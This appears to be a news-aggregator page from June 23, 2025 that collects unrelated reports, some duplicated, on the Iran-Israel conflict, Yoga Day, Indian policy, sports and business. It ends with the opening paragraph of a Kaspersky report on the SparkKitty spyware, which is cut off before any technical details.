Source: Government of India (4)

Jerusalem was gripped by fresh anxiety today as a missile was spotted overhead, followed by distant explosions, according to a Reuters report. The Israeli military subsequently activated air raid sirens across central and southern Israel, citing further incoming missile threats from Iran. The development comes amid heightened tensions in West Asia, following U.S. airstrikes on Iranian nuclear facilities.

Over the past ten days, central Israel has sustained heavy damage, with repeated attacks also hitting the northern port city of Haifa. The ongoing conflict has significantly raised fears of a broader regional war, prompting renewed diplomatic efforts. High-level talks are reportedly underway in Moscow in a bid to defuse the crisis.

China has called on both Iran and Israel to de-escalate hostilities. “The Chinese side urges the parties to the conflict to prevent the situation from escalating repeatedly, resolutely avoid the spillover of war, and return to the path of political resolution,” said foreign ministry spokesperson Guo Jiakun on Monday.

Meanwhile, Spain’s foreign minister announced plans to urge the European Union to suspend a key cooperation agreement with Israel and to consider a weapons embargo, stating that Europe “must show courage” in response to the escalating violence.

In the U.S., President Donald Trump stirred debates by reviving talk of regime change in Iran. In a social media post, he questioned the legitimacy of the current Iranian leadership and wrote, “If they can’t MAKE IRAN GREAT AGAIN—why wouldn’t there be a Regime change???”

Iran’s Foreign Minister, Abbas Araghchi, has arrived in the Russian capital for high-stakes talks with Russia’s top leadership. As a long-standing ally of Iran and a significant power in the region, Russia is viewed as a potential mediator in this deepening crisis.

The discussions are expected to concentrate on de-escalation strategies, broader regional security concerns, and exploring any viable diplomatic pathways to resolve the ongoing hostilities.

While Russian officials have indicated their readiness to play a constructive role in facilitating peace, the path forward remains highly uncertain. The international community, including the United Nations and other key global powers, continues to closely monitor the volatile situation, issuing urgent calls for restraint and dialogue from all parties involved.

June 23, 2025
PM Modi commends enthusiastic celebrations of Yoga Day across the world

Source: Government of India

Source: Government of India (4)

Prime Minister Narendra Modi on Sunday appreciated the enthusiastic celebrations of the 11th International Day of Yoga (IDY) across India and around the world.

The Ministry of Information and Broadcasting shared a video showcasing yoga events held globally to mark IDY 2025.

In a post on X, the Ministry said: “Across continents and time zones, the world moved in unity. The 11th International Yoga Day was celebrated with the theme: ‘Yoga for One Earth, One Health.’ From ‘Me’ to ‘We,’ yoga is shaping a healthier, more harmonious planet. Prime Minister Narendra Modi urged the global community to embrace ‘Yoga for Humanity’ and highlighted the role of inner peace in fostering global harmony.”

Responding to the post, PM Modi said on X: “Glad to see the International Day of Yoga being celebrated with immense enthusiasm across India and in various parts of the world!”

PM Modi led the IDY celebrations on Friday from the scenic beachfront of Visakhapatnam, joining nearly 5 lakh participants in a mass yoga demonstration under the Common Yoga Protocol (CYP), which is a structured 45-minute Yoga routine.

The national event was part of a wider movement, with Yoga Sangam sessions held simultaneously at over 3.5 lakh locations across the country, reflecting the growing popularity and reach of yoga as a tool for holistic well-being.

This year’s theme, “Yoga for One Earth, One Health,” underscores the deep connection between individual health and planetary wellness, resonating with India’s ancient philosophy of “Sarve Santu Niramaya” — May all be free from disease.

In addition to public sessions, new initiatives like “Yoga with Family” and “Yoga Unplugged”—aimed at engaging youth—have been launched on platforms such as MyGov and MyBharat, encouraging mass digital participation.

Since the United Nations General Assembly adopted India’s proposal in 2015 to observe June 21 as International Day of Yoga, Prime Minister Modi has led celebrations from locations including New Delhi, Chandigarh, Lucknow, Mysuru, Srinagar, and even New York’s UN Headquarters, making IDY a global wellness movement.

June 23, 2025
India goes green: landmark tender to fuel fertilizers with clean ammonia

Source: Government of India

Source: Government of India (4)

The Solar Energy Corporation of India (SECI), a Navratna Central Public Sector Undertaking under the Ministry of New and Renewable Energy, has floated a landmark tender for the offtake of green ammonia. The move marks a significant step towards decarbonizing the fertilizer sector, which is currently dependent on fossil fuel-based hydrogen for ammonia production.

The tender, issued on June 7, 2024, invites bids for the supply of 7.24 lakh tonnes of green ammonia annually. It covers 13 fertilizer plants across the country and falls under Tranche I of Mode 2A of the Strategic Interventions for Green Hydrogen Transition (SIGHT) Scheme. The last date for bid submissions is June 26, 2025.

Ammonia is a key input in the production of urea and other nitrogen-based fertilizers. At present, it is largely produced using hydrogen derived from imported natural gas, leading to considerable carbon emissions. SECI’s new tender seeks to change this by using renewable energy to produce green hydrogen and, consequently, green ammonia. The aim is to enable low-emission, domestically sourced fertilizer production.

To make the transition financially viable, the government is offering production-linked incentives under the National Green Hydrogen Mission. These include subsidies of ₹8.82 per kilogram in the first year, ₹7.06 in the second, and ₹5.30 in the third—amounting to a total support of ₹1,533.4 crore. A robust Payment Security Mechanism has also been put in place to safeguard suppliers from delays in payments by fertilizer companies.

The tender process will follow SECI’s e-reverse auction model to ensure transparency and competitive price discovery. The contracts will run for a 10-year period, providing market certainty and encouraging long-term investment.

India consumes approximately 17-19 million tonnes of ammonia annually, with more than 50% of its hydrogen requirement used in fertilizer production. However, most of this is derived from imported natural gas. SECI’s initiative is expected to drastically cut this dependence, reduce exposure to global gas price fluctuations, and lower the trade deficit. Producing green hydrogen emits less than 2 kg of CO₂ per kilogram, compared to up to 12 kg CO₂ from conventional grey hydrogen.

The tender is seen as a solution to the “chicken-and-egg” problem that has stalled progress in the hydrogen sector. By aggregating demand and securing long-term offtake agreements, SECI is aiming to provide the necessary momentum to build a strong domestic green hydrogen and ammonia ecosystem. It is also expected to support investment in electrolyser manufacturing and other clean energy segments.

June 23, 2025
MIL-OSI Asia-Pac: Director General David Cheng-Wei Wu and Mrs. Wu Attended the First Planning Meeting of the 2025 Double Tenth Celebration Committee

Source: Republic of China Taiwan

The 2025 Double Tenth Celebration Committee held its first planning meeting today, chaired by Chairperson Michael Wu. The meeting was well attended by Overseas Community Affairs Council (OCAC) Commissioners Johnson Hsiung and Shirley Chen, as well as community leaders and representatives from various organizations. Director General David Cheng-Wei Wu and Mrs. Wu were also invited to participate.
Chairperson Wu expressed his hope that senior members of the Taiwanese community would continue to offer their valuable guidance and share their experiences. He also looked forward to greater involvement from the younger generation, to carry on the proud traditions of the Taiwanese community in Sydney. He also gave a briefing on this year’s National Day Gala theme: “Reflections of Culture in an Age of Technology,” which explores how Taiwan’s traditional culture continues to thrive and evolve in the digital era. From classical art forms to innovative reinterpretations, the event highlights the harmony between heritage and technology — showcasing Taiwan’s identity in a modern world.
DG Wu first thanked last year’s Chairperson, Sophia Huang, for her dedication and hard work. DG Wu also commended Chairperson Wu for taking on the responsibility despite his busy schedule. He noted that this year’s theme, which focuses on technology, fully reflects Taiwan’s leading position in the global high-tech industry — with TSMC standing as a pinnacle of semiconductor excellence and cutting-edge research. DG Wu expressed deep appreciation for the unity of the Taiwanese community and their continued support for the government of R.O.C.(Taiwan). Finally, this year’s National Day Gala will be held on the evening of Double Ten Day, symbolizing the celebration’s anticipated success.
The committee also presented budget requirements and outlined the plans of related events. Chairperson Wu thoughtfully prepared a selection of delicious food to thank community members for their participation and support.

MIL OSI Asia Pacific News –

June 23, 2025
MIL-OSI Africa: Canon makes its EOS VR SYSTEM compatible with “Apple Projected Media Profile” and “spatial photo” in an aim to expand the 3D VR market and strengthens collaboration with Apple

Canon Inc. (www.Canon-CNA.com) announced that two of its RF lenses for 3D VR video — the RF5.2mm F2.8 L DUAL FISHEYE (released in December 2021) and the RF-S3.9mm F3.5 STM DUAL FISHEYE (released in June 2024) — will offer compatibility with “Apple Projected Media Profile” (hereafter “APMP”), a QuickTime movie profile that will be supported by the Apple Vision Pro spatial computer developed by Apple Inc. (hereafter “Apple”) [1]. Canon has also announced that it will make its RF-S7.8mm F4 STM DUAL lens (released in November 2024) compatible with “spatial photo,” and that it will help to further expand the 3D VR market through collaboration with Apple going forward.

Canon launched the EOS VR System for capturing VR video in 2021, and since then has met the needs for VR video production in diverse fields including entertainment, tourism, and education. In June 2024, the company announced the RF-S7.8mm F4 STM DUAL, a lens capable of recording “spatial video,” which is a type of 3D footage with a sense of depth, for the Apple Vision Pro. Through these developments, Canon has been helping to expand the range of expression available in 3D VR.

At the Worldwide Developers Conference (WWDC), hosted by Apple on June 9, 2025, Apple announced visionOS 26, the newest OS for the Apple Vision Pro. In conjunction with this announcement, two of Canon’s RF lenses for 3D VR video, RF5.2mm F2.8 L DUAL FISHEYE and RF-S3.9mm F3.5 STM DUAL FISHEYE, will offer native playback of “APMP,” which will be supported by visionOS 26, scheduled to be released in the latter half of 2025. Specifically, footage shot with these lenses and compatible cameras [2] can be converted to “APMP” using the EOS VR Utility [3] app, making it even easier for users to enjoy a high-quality, immersive experience with the Apple Vision Pro.

By updating EOS VR Utility, the RF-S7.8 mm F4 STM DUAL will also be able to handle not only “spatial video” but also “spatial photo,” which is a 3D image that allows users to enjoy a sense of depth as a still image, when combined with Canon’s mirrorless camera models EOS R7 (released in June 2022) and EOS R50 V (released in May 2025). Additionally, in mid-July 2025, the EOS R50 (released in March 2023) will also be made compatible with the EOS VR SYSTEM through a firmware update, thereby enabling both “spatial video” and “spatial photo.”

Going forward, Canon will further strengthen the EOS VR SYSTEM in collaboration with Apple to meet the creative needs of pro users who strive to produce stunning immersive video as they explore new ways of storytelling.

[1] Apple Vision Pro, QuickTime, and visionOS are trademarks of Apple Inc.

[2] RF5.2mm F2.8 L DUAL FISHEYE can be mounted on the following cameras: EOS R5 (July 2020), EOS R5C (March 2022), EOS R6 Mark II (December 2022), EOS R5 Mark II (August 2024), EOS C400 (September 2024), EOS C80 (November 2024). RF-S3.9 mm F3.5 STM DUAL FISHEYE can be mounted on: EOS R7, EOS R50 V. As of June 9th, 2025.

[3] “APMP,” “spatial video” and “spatial photo” are only supported by the macOS version of EOS VR Utility. Some features may require a fee.

Distributed by APO Group on behalf of Canon Central and North Africa (CCNA).

Media enquiries, please contact:
Canon Central and North Africa
Mai Youssef
e. Mai.youssef@canon-me.com

APO Group – PR Agency
Rania ElRafie
e. Rania.ElRafie@apo-opa.com

About Canon Central and North Africa:
Canon Central and North Africa (CCNA) (www.Canon-CNA.com) is a division within Canon Middle East FZ LLC (CME), a subsidiary of Canon Europe. The formation of CCNA in 2016 was a strategic step that aimed to enhance Canon’s business within the Africa region – by strengthening Canon’s in-country presence and focus. CCNA also demonstrates Canon’s commitment to operating closer to its customers and meeting their demands in the rapidly evolving African market.

Canon has been represented in the African continent for more than 15 years through distributors and partners that have successfully built a solid customer base in the region. CCNA ensures the provision of high quality, technologically advanced products that meet the requirements of Africa’s rapidly evolving marketplace. With over 100 employees, CCNA manages sales and marketing activities across 44 countries in Africa.

Canon’s corporate philosophy is Kyosei (http://apo-opa.co/3TAiM29) – ‘living and working together for the common good’. CCNA pursues sustainable business growth, focusing on reducing its own environmental impact and supporting customers to reduce theirs using Canon’s products, solutions and services. At Canon, we are pioneers, constantly redefining the world of imaging for the greater good. Through our technology and our spirit of innovation, we push the bounds of what is possible – helping us to see our world in ways we never have before. We help bring creativity to life, one image at a time. Because when we can see our world, we can transform it for the better.

For more information: www.Canon-CNA.com

MIL OSI Africa –

June 23, 2025
MIL-OSI Africa: Oklahoma City Thunder Are 2025 National Basketball Association (NBA) Champions!

In a Finals Game 7 classic that featured 11 lead changes and yet another late Indiana comeback, the Thunder got 29 points & 12 assists from Finals MVP Shai Gilgeous-Alexander to hold off a relentless Pacers team, 103-91 (https://apo-opa.co/44cTtIy), and claim the Larry O’Brien Trophy.

The win marks the Thunder’s first championship in the franchise’s Oklahoma City era, as top-seeded OKC — the second-youngest Finals team in the shot-clock era — becomes the fourth team in NBA history to win 84 total games.

Playing most of the game without an injured Tyrese Haliburton, Indiana rallied from 22 down to cut OKC’s lead to 10 in the 4th quarter, but never got closer.

Chet Holmgren recorded a Finals Game 7-record five blocks to go with 18 points and Jalen Williams dropped 20 as the Thunder won the turnover battle, 21-7.

Bennedict Mathurin had 24 off the bench for Indiana. Pascal Siakam (Cameroon) recorded 16 points and 4 rebounds.

Distributed by APO Group on behalf of National Basketball Association (NBA).

MIL OSI Africa –

June 23, 2025
MIL-OSI Africa: African Mining Week 2025 Set to Drive Investment and Sustainable Growth

Download logo

In the fast-changing mineral economy, African Mining Week (AMW) 2025 – taking place October 1-3 in Cape Town – is set to become the definitive platform for shaping the future of the African mining industry. Taking place under the theme: From Extraction to Beneficiation: Unlocking Africa’s Mineral Wealth, the event will unite the global and African mining industries to engage in dialogue and sign deals. To meet the expected rise in global demand, mineral production will need to increase by nearly 500% by 2050. AMW 2025 positions Africa at the heart of global supply chains, turning policy into progress and opportunity into action.

A Launchpad for African Mining Projects

Through its investment-focused program, AMW 2025 will drive capital into African mining projects, connecting players from across the global industry while fostering partnerships, deal-signing and dialogue. The event takes place at a time when the international community is seeking new mineral investment opportunities while African countries are targeting greater production and mineral beneficiation. Notably, Zimbabwe plans to build a $12 billion economy by 2030 on the back of its mining industry; Angola strives to increase diamond production to 17.53 million carats by 2027; while Ghana seeks to deliver 8 million tons of manganese in 2025. Achieving these goals will require substantial investments and AMW 2025 will serve as a launchpad for future projects.

Addressing Challenges, Highlighting Opportunities

As the demand for minerals grows, so does the need to integrate technology that enhances efficiency and sustainable mining operations. The AMW 2025 program is designed to tackle the most pressing challenges across the African mining industry, with sessions geared towards creating home-grown solutions to securing capital, technology and expertise. On the financing side, sessions include The Investor Perspective: Financing Africa’s Mineral Industrialization; Mergers, Acquisitions, and Partnerships: Building Resilience in a Consolidating Industry; Innovative Investment Strategies for Nigeria’s Infrastructure Development; and more. Industry spotlight sessions on The Cobalt Opportunity; Botswana’s Diamond Legacy; Ghana’s Gold Renaissance; South African PGMs and more will explore industry-specific opportunities, while a series of technical workshops and a technology forum will outline emerging technologies across the industry. Tech-driven sessions include Autonomous Mining: How Robotics and AI are Revolutionizing Resource Extraction; Youth-Driven Innovations in Mining Technology; From Ideas to Impact; and more.

Strategic Engagement Opportunities

Engagement is a feature of the AMW 2025 program, with networking sessions offering attendees the chance to connect with stakeholders and forge collaborative partnerships. The program is tailored to facilitate collaboration, with roundtables focused on bringing global and African partners together. Notable sessions include US-Africa Collaboration on Critical Mineral Infrastructure; China-Africa Corporation on Critical Minerals; European Partnerships in African Mining; Strengthening Middle East and Africa Partnerships, and more. The conference will also host a Women in Leadership Forum, aimed at breaking down barriers for women in the industry by fostering greater collaboration, and a Junior Miners Forum, aimed at showcasing opportunities for youth in the industry. Through networking and matchmaking forums, cocktails and luncheons, business-matching and meetings, AMW 2025 will usher in a new era of collaborative mining development in Africa.

Navigating Critical Minerals Gaps

Co-located alongside African Energy Week: Invest in African Energies – hosted on September 29 to October 3, AMW 2025 is uniquely positioned to explore Africa’s emerging role as the center of the global energy transition. Serving as core components in the development of energy transition-related technologies, the demand for critical minerals is growing rapidly. Between 2022 and 2050, the demand for nickel will double, cobalt will triple while lithium demand will rise tenfold. Home to 30% of the world’s critical minerals, Africa is well-positioned to drive this transition. By navigating supply gaps within the critical minerals industry, AMW 2025 will connect international partners to African mines.

African Mining Week serves as a premier platform for exploring the full spectrum of mining opportunities across Africa. The event is held alongside the African Energy Week: Invest in African Energies 2025 conference from October 1-3 in Cape Town. Sponsors, exhibitors and delegates can learn more by contacting sales@energycapitalpower.com.

Distributed by APO Group on behalf of Energy Capital & Power.

MIL OSI Africa –

June 23, 2025
MIL-OSI Africa: Minister Lamola conveys condolences in Zambia, discusses repose of former President Lungu

Download logo

The Minister of International Relations and Cooperation of the Republic of South Africa, Mr Ronald Lamola, MP, on Sunday concluded a High-Level Diplomatic Mission to Lusaka, Republic of Zambia, as Presidential Special Envoy.

Minister Lamola was received by His Excellency President Hakainde Hichilema, to whom he conveyed President Ramaphosa’s profound condolences on behalf of the Government and people of South Africa.

Minister Lamola expressed solidarity with the Government and citizens of Zambia following the untimely passing of former President Edgar Lungu, assuring them of South Africa’s unwavering support during this period of national mourning.

In reaffirming the South African Government’s position, Minister Lamola emphasised that a state burial in Zambia represents the most fitting tribute to honour Former President Lungu’s distinguished legacy and service to the Zambian nation.

Concurrently, Minister Lamola acknowledged the legal obligation to respect the expressed wishes of the late former President’s immediate family.

He underscored the Government’s commitment to navigating this sensitive matter with the utmost dignity, grace, and mutual respect principles befitting the memory of a revered statesman and the enduring bonds between South Africa and Zambia.

The Minister extended prayers and sympathies to all affected by this loss and reiterated South Africa’s steadfast friendship with Zambia.

Distributed by APO Group on behalf of Republic of South Africa: Department of International Relations and Cooperation.

MIL OSI Africa –

June 23, 2025
MIL-OSI Africa: President Ramkalawan Commends Spirit of Sportsmanship at International Boxing Tournament

Download logo

The three-day International Boxing Tournament, jointly organised by Tides Seychelles and the Seychelles Boxing Federation, concluded on Sunday with resounding success, marking a significant moment for the local sporting calendar.

The President of the Republic of Seychelles, Mr. Wavel Ramkalawan, attended the entire tournament at the Paradise Arena, lending his wholehearted support to the event and to the athletes representing Seychelles and the six other participating nations: Sri Lanka, India, Russia, Mauritius, South Africa, and Réunion.

In a show of unwavering encouragement, President Ramkalawan applauded the courage, discipline and determination demonstrated by all athletes, and extended profound congratulations to the organisers for delivering a professional and uplifting event.

Speaking in an interview after the tournament, the President remarked:

“It was a pleasure to be back at Paradise Arena to see our people once again come together in unity to support our local boxers. The energy, the pride, and the encouragement from the crowd have been incredible. This tournament has not only offered our athletes vital exposure to international competition but also given us a realistic reflection of our current level of performance. It is through such experiences that we learn where we stand and where we must go from here. Let us use this as a stepping stone to invest more in training, discipline, and development so that Seychelles continues to grow stronger in the world of boxing.”

President Ramkalawan further encouraged Team Seychelles to remain committed to their journey, reminding them that the entire nation stands behind them.

The tournament brought together talents from seven countries and served as a platform for athletic excellence, international camaraderie, and the promotion of boxing in Seychelles. It also highlighted the growing potential of the Paradise Arena as a regional hub for sports events.

The Government of Seychelles continues to support initiatives that empower youth and strengthen sports development across the country.

Distributed by APO Group on behalf of State House Seychelles.

MIL OSI Africa –

June 23, 2025
Any Iranian closure of Hormuz Strait would be ‘extremely dangerous’, EU’s top diplomat says

Source: Government of India

Source: Government of India (4)

An Iranian closure of the Strait of Hormuz would be dangerous and “not good for anybody”, the European Union’s top diplomat said on Monday.

“The concerns of retaliation and this war escalating are huge, especially closing of the Strait of Hormuz by Iran is something that would be extremely dangerous and not good for anybody,” Kaja Kallas told reporters ahead of a meeting with EU foreign ministers.

Iran’s Press TV reported on Sunday that Iran’s Supreme National Security Council needed to make a final decision on whether to close the strait, after parliament was reported to back the measure. About 20% of global oil and gas demand flows through the channel.

More to follow.

(Reuters)

June 23, 2025
Any Iranian closure of Hormuz Strait would be ‘extremely dangerous’, EU’s top diplomat says

Source: Government of India

Source: Government of India (4)

An Iranian closure of the Strait of Hormuz would be dangerous and “not good for anybody”, the European Union’s top diplomat said on Monday.

“The concerns of retaliation and this war escalating are huge, especially closing of the Strait of Hormuz by Iran is something that would be extremely dangerous and not good for anybody,” Kaja Kallas told reporters ahead of a meeting with EU foreign ministers.

Iran’s Press TV reported on Sunday that Iran’s Supreme National Security Council needed to make a final decision on whether to close the strait, after parliament was reported to back the measure. About 20% of global oil and gas demand flows through the channel.

More to follow.

(Reuters)

June 23, 2025
MIL-OSI China: City cruise into Club World Cup knockouts with 6-0 win

Source: People’s Republic of China – State Council News

Manchester City and Juventus reached the last 16 of the FIFA Club World Cup on Sunday while Real Madrid moved closer with a gritty win over Pachuca despite playing nearly the entire match with 10 men.

Pachuca, Al Ain and Wydad Casablanca joined previously eliminated Auckland City, Ulsan, Urawa Red Diamonds and Los Angeles FC in exiting the tournament in the United States.

In Philadelphia, 20-year-old Turkiye international forward Kenan Yildiz scored twice as Juventus routed Morocco’s Wydad Casablanca 4-1 to clinch a knockout phase spot with a game to spare.

Abdelmounaim Boutouil gifted the Italian club the lead with a sixth-minute own goal and Yildiz doubled the advantage by thumping a 20-yard effort into the top-right corner.

Thembinkosi Lorch narrowed the deficit, lifting a shot over goalkeeper Michele Di Gregorio after Nordin Amrabat’s defense-splitting pass.

The impressive Yildiz made it 3-1 as he wrong-footed Boutouil before calmly side-footing into the far corner.

Serbian striker Dusan Vlahovic put the result beyond doubt by converting a 94th-minute penalty after being fouled by Guilherme Ferreira.

Juventus now has six points from its two games while Wydad is eliminated irrespective of its last group-stage fixture against Al Ain.

“It was a different kind of match, also because of the [early] kick-off time and the tempo was lower,” Juventus manager Igor Tudor said afterwards. “They had prepared for us as well. We scored early and that helped us. But in football, you never know, you always have to stay alert.

“I’m never calm, not even at 3-1 or 4-1. I always see danger. Credit to the boys, two good wins. Tonight they’ll have an evening off and a dinner out. They’ve earned it. Now we prepare for City, which will be a great challenge,” he added.

In Charlotte, Real Madrid registered its first win of the tournament with a 3-1 defeat of Mexican side Pachuca.

The Spanish giants were reduced to 10 men in the seventh minute after Raul Asencio was shown a straight red card for pulling down Salomon Rondon when the Venezuela international was through on goal.

Despite the numerical disadvantage, Real Madrid took the lead through Jude Bellingham, who charged into the box after Fran Garcia’s pass before lashing low into the far corner.

Arda Guler doubled the lead with a clinical finish after combining with Gonzalo Garcia and Federico Valverde made it 3-0 by volleying home at the far post following Brahim Diaz’s lofted pass.

Pachuca pulled one back through Elias Montiel’s deflected strike 10 minutes from time.

The victory lifted Real Madrid to the top of Group H with four points while Pachuca is last and cannot advance to the next stage.

“We had to defend with one less player in a low block and in that situation you have to know how to suffer and have the humility to find the right moment,” Real Madrid manager Xabi Alonso said.

“We weren’t able to show what we’ve been working on but the defensive line held strong and we had good periods of possession. We took a lot of positives from the game, especially the three points.”

In Atlanta, Ilkay Gundogan struck twice as Manchester City trounced Al Ain of the United Arab Emirates 6-0.

Claudio Echeverri, Oscar Bobb, Rayan Cherki and Erling Haaland were also on target – the latter from the penalty spot – as City secured its place in the next round.

Al Ain had only 26% of the possession and managed only one shot on target, sealing its early exit from the competition.

“We spoke a lot before the game about how to maintain our pressure so that we could score the goals that we did,” Manchester City manager Pep Guardiola said.

“The guys that played today took their opportunity. We are fortunate to have a lot of talented players that are waiting for their chance.”

In Sunday’s other fixture, Austria’s RB Salzburg drew 0-0 with Saudi Arabian club Al Hilal at Audi Field in Washington D.C.

Al Hilal had 58 percent of the total possession but managed only four shots on target while Salzburg had six attempts saved by Morocco international goalkeeper Yassine Bounou.

The result leaves Salzburg second in Group H with four points, two ahead of third-placed Al Hila

MIL OSI China News –

June 23, 2025
MIL-OSI China: NBA Finals: OKC cap incredible season to win title

Source: People’s Republic of China – State Council News

The Oklahoma City Thunder claimed the 2024-2025 NBA championship after defeating the Indiana Pacers 103-91 in a decisive Game 7 of the Finals on Sunday, winning the best-of-seven series 4-3 to secure their first title since relocating to Oklahoma City in 2008.

It marks the franchise’s second NBA championship in history, with the first coming in 1979 when the team was known as the Seattle SuperSonics.

Thunder star Shai Gilgeous-Alexander was named Finals MVP after an outstanding series, averaging 30.3 points, 4.6 rebounds and 5.6 assists per game. In Game 7, he delivered a clutch performance with 29 points, five rebounds and 12 assists.

The series was deadlocked at 3-3 entering the final game. Early on, the visiting Pacers held a slight edge behind standout play from Tyrese Haliburton. However, midway through the first quarter, Haliburton suffered a lower leg injury and was forced to exit the game.

Despite his absence, the Pacers remained competitive, holding a one-point lead at halftime.

The Thunder came out strong in the second half, gradually building their lead to more than 20 points. Oklahoma City maintained control down the stretch and sealed the win with a 12-point margin.

Jalen Williams added 20 points for the Thunder, while Chet Holmgren contributed 18.

For the Pacers, Bennedict Mathurin led the team with 24 points and 13 rebounds in the loss.

MIL OSI China News –

June 23, 2025
India witnessing transformational decade under PM Modi: Union Minister Jitendra Singh

Source: Government of India

Source: Government of India (4)

In an exclusive interview with Doordarshan News, Union Minister Dr. Jitendra Singh highlighted the sweeping governance reforms and inclusive development initiatives undertaken during the past 11 years of Prime Minister Narendra Modi’s leadership. He described the period as a “transformational decade” that has democratized aspirations and expanded opportunities across regions and sectors.

Democratisation of Civil Services and Aspirations

Singh emphasized that the Civil Services, once dominated by select states like Bihar and Tamil Nadu, now see top performers from previously underrepresented regions such as Jammu & Kashmir, Punjab, and Haryana. Citing examples like Parsanjit Kour from Poonch (AIR 11, 2022) and Anmol Sher Singh Bedi from Punjab (AIR 2, 2016), he hailed this shift as proof of the system’s increasing objectivity and accessibility.

“This is the true essence of democracy—where every mother, regardless of her socio-economic standing, has the confidence to believe her child can reach the top,” he stated.

Start-Up India Reframed Employment Thinking

Singh noted that PM Modi’s 2016 call for “Start-Up India, Stand-Up India” revolutionized the employment landscape. “People realized that jobs don’t just mean Sarkari Naukri—they mean innovation, entrepreneurship, and startups,” he said. He pointed to the biotechnology sector’s exponential growth from just 50 startups in 2014 to over 10,075 in 2024, with a valuation leap from $10 billion to $170 billion.

Integration of Northeast and J&K

Lauding the integration of the Northeast and Jammu & Kashmir into India’s mainstream development, the Minister said regions long isolated now enjoy railway connectivity and are participating in sectors like aviation and hospitality. He recalled the emotional story of young women from Manipur working in airlines—tragically lost in an Ahmedabad air crash—as symbolic of the transformation these regions have undergone.

India’s Ascent in Space and Biotech

Singh reaffirmed India’s rising stature in space and science. He announced that Group Captain Shubhanshu Shukla will serve as the mission pilot on the Axiom-4 mission, conducting biotech experiments using indigenous kits. He added that India is on track to establish its own space station—‘Bharat Antariksh Station’—by 2035.

Revolution in Governance and Service Delivery

Highlighting key governance reforms, Singh said India’s grievance redressal system – Centralized Public Grievance Redress and Monitoring System (CPGRAMS) – has evolved into a global model, handling over 26 lakh grievances in 2024 with a 96% disposal rate—compared to just 2 lakh in 2014.

He also praised the Digital Life Certificate (DLC) system for pensioners, powered by facial recognition technology, which spares elderly citizens from bank visits. Additionally, reforms now allow women officers to nominate parents or children as pension beneficiaries, reflecting a more compassionate system.

Zero-Corruption Record and Cultural Shift

Singh stated that “not a single charge of corruption” has surfaced against any member of the Union Council of Ministers over the past 11 years, contrasting it with previous regimes plagued by scams. He said this clean governance, combined with 100% saturation of schemes like PM Awas Yojana—even in non-traditional voter areas—signals a shift away from vote-bank politics.

J&K Stability and Future Prospects

Addressing the situation in Jammu & Kashmir, the Minister said normalcy has returned, with tourism booming. “Visit Pahalgam today—you’ll find it crowded despite recent incidents,” he said, adding that youth in the region are determined to be part of India’s development journey. He also called the recent discovery of lithium reserves in J&K a potential economic game-changer.

Towards Viksit Bharat 2047

Concluding his remarks, Singh underscored the role of citizens in shaping the nation’s future. “The real driving force behind Viksit Bharat 2047 will be the people of India—their support, aspirations, and participation will define the next 25 years of our journey,” he said.

June 23, 2025
India witnessing transformational decade under PM Modi: Union Minister Jitendra Singh

Source: Government of India

Source: Government of India (4)

In an exclusive interview with Doordarshan News, Union Minister Dr. Jitendra Singh highlighted the sweeping governance reforms and inclusive development initiatives undertaken during the past 11 years of Prime Minister Narendra Modi’s leadership. He described the period as a “transformational decade” that has democratized aspirations and expanded opportunities across regions and sectors.

Democratisation of Civil Services and Aspirations

Singh emphasized that the Civil Services, once dominated by select states like Bihar and Tamil Nadu, now see top performers from previously underrepresented regions such as Jammu & Kashmir, Punjab, and Haryana. Citing examples like Parsanjit Kour from Poonch (AIR 11, 2022) and Anmol Sher Singh Bedi from Punjab (AIR 2, 2016), he hailed this shift as proof of the system’s increasing objectivity and accessibility.

“This is the true essence of democracy—where every mother, regardless of her socio-economic standing, has the confidence to believe her child can reach the top,” he stated.

Start-Up India Reframed Employment Thinking

Singh noted that PM Modi’s 2016 call for “Start-Up India, Stand-Up India” revolutionized the employment landscape. “People realized that jobs don’t just mean Sarkari Naukri—they mean innovation, entrepreneurship, and startups,” he said. He pointed to the biotechnology sector’s exponential growth from just 50 startups in 2014 to over 10,075 in 2024, with a valuation leap from $10 billion to $170 billion.

Integration of Northeast and J&K

Lauding the integration of the Northeast and Jammu & Kashmir into India’s mainstream development, the Minister said regions long isolated now enjoy railway connectivity and are participating in sectors like aviation and hospitality. He recalled the emotional story of young women from Manipur working in airlines—tragically lost in an Ahmedabad air crash—as symbolic of the transformation these regions have undergone.

India’s Ascent in Space and Biotech

Singh reaffirmed India’s rising stature in space and science. He announced that Group Captain Shubhanshu Shukla will serve as the mission pilot on the Axiom-4 mission, conducting biotech experiments using indigenous kits. He added that India is on track to establish its own space station—‘Bharat Antariksh Station’—by 2035.

Revolution in Governance and Service Delivery

Highlighting key governance reforms, Singh said India’s grievance redressal system – Centralized Public Grievance Redress and Monitoring System (CPGRAMS) – has evolved into a global model, handling over 26 lakh grievances in 2024 with a 96% disposal rate—compared to just 2 lakh in 2014.

He also praised the Digital Life Certificate (DLC) system for pensioners, powered by facial recognition technology, which spares elderly citizens from bank visits. Additionally, reforms now allow women officers to nominate parents or children as pension beneficiaries, reflecting a more compassionate system.

Zero-Corruption Record and Cultural Shift

Singh stated that “not a single charge of corruption” has surfaced against any member of the Union Council of Ministers over the past 11 years, contrasting it with previous regimes plagued by scams. He said this clean governance, combined with 100% saturation of schemes like PM Awas Yojana—even in non-traditional voter areas—signals a shift away from vote-bank politics.

J&K Stability and Future Prospects

Addressing the situation in Jammu & Kashmir, the Minister said normalcy has returned, with tourism booming. “Visit Pahalgam today—you’ll find it crowded despite recent incidents,” he said, adding that youth in the region are determined to be part of India’s development journey. He also called the recent discovery of lithium reserves in J&K a potential economic game-changer.

Towards Viksit Bharat 2047

Concluding his remarks, Singh underscored the role of citizens in shaping the nation’s future. “The real driving force behind Viksit Bharat 2047 will be the people of India—their support, aspirations, and participation will define the next 25 years of our journey,” he said.

June 23, 2025

MIL-OSI Banking: SparkKitty, SparkCat’s little brother: A new Trojan spy found in the App Store and Google Play

Source: Securelist – Kaspersky

Headline: SparkKitty, SparkCat’s little brother: A new Trojan spy found in the App Store and Google Play

In January 2025, we uncovered the SparkCat spyware campaign, which was aimed at gaining access to victims’ crypto wallets. The threat actor distributed apps containing a malicious SDK/framework. This component would wait for a user to open a specific screen (typically a support chat), then request access to the device’s gallery. It would then use an OCR model to select and exfiltrate images of interest. Although SparkCat was capable of searching for any text within images, that campaign specifically targeted photos containing seed phrases for crypto wallets. The malware was distributed through unofficial sources as well as Google Play and App Store. Now, we’ve once again come across a new type of spyware that has managed to infiltrate the official app stores. We believe it is connected to SparkCat and also targets the cryptocurrency assets of its victims.

Here are the key facts about this new threat:

